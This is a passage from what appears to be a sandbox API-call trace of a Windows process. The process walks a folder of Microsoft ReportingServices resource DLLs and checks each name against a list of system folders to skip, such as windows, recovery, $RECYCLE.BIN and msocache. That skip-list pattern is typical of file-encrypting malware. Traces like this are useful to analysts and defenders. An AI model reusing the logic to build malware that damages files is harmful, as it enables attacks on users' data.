lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.DataExtensions.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.DataExtensions.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f158 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.792] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb654e78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb654e78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb67b102, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x11ac0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2=".") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="..") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="...") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="windows") returned -1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20dde8, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.Diagnostics.resources.dll", cchWideChar=53, lpMultiByteStr=0x20d578, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 53 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e9d0 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.792] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6cc6b6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6cc6b6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6cc6b6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19af0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cAlternateFileName="MIC811~1.DLL")) returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2=".") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="..") returned 1 [0126.792] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="...") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="windows") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="recovery") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="perflogs") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="system volume information") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpString2="msocache") returned -1 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0126.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d920, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0126.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.793] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", cchWideChar=63, lpMultiByteStr=0x20d770, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.Common.resources.dll", lpUsedDefaultChar=0x0) returned 63 [0126.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0126.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0126.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.793] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x605aed7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x605aed7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6081126, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.QueryDesigners.resources.dll", cAlternateFileName="MI63FB~1.DLL")) returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2=".") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="..") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="...") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="windows") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="recovery") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="perflogs") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="documents and settings") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="system volume information") returned -1 [0126.793] lstrcmpiW (lpString1="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpString2="msocache") returned -1 [0126.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20d920, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 56 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", cchWideChar=56, lpMultiByteStr=0x20dba8, cbMultiByte=56, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.QueryDesigners.resources.dll", lpUsedDefaultChar=0x0) returned 56 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.794] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6735b3a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6735b3a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6735b3a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cAlternateFileName="MI5C38~1.DLL")) returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2=".") returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="..") returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="...") returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="windows") returned -1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="recovery") returned -1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="perflogs") returned -1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="system volume information") returned -1 [0126.794] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpString2="msocache") returned -1 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d578, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", cchWideChar=61, lpMultiByteStr=0x20d920, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Common.resources.dll", lpUsedDefaultChar=0x0) returned 61 [0126.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0126.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f3a8 [0126.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.795] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8719376, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8719376, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8719376, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb068, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cAlternateFileName="MI335D~1.DLL")) returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2=".") returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="..") returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="...") returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="windows") returned -1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="recovery") returned -1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="perflogs") returned -1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="documents and settings") returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="system volume information") returned -1 [0126.795] lstrcmpiW (lpString1="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpString2="msocache") returned -1 [0126.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.ReportDesign.Forms.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.798] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf854e731, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf854e731, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf9a04f26, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38e8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.RsClient.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2=".") returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="..") returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="...") returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="windows") returned -1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="recovery") returned -1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="perflogs") returned -1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="documents and settings") returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="system volume information") returned -1 [0126.798] lstrcmpiW (lpString1="Microsoft.ReportingServices.RsClient.resources.dll", lpString2="msocache") returned -1 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.798] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0126.798] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.RsClient.resources.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.RsClient.resources.dll", lpUsedDefaultChar=0x0) returned 50 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0126.799] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45d3b76, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45d3b76, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x9ad0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, 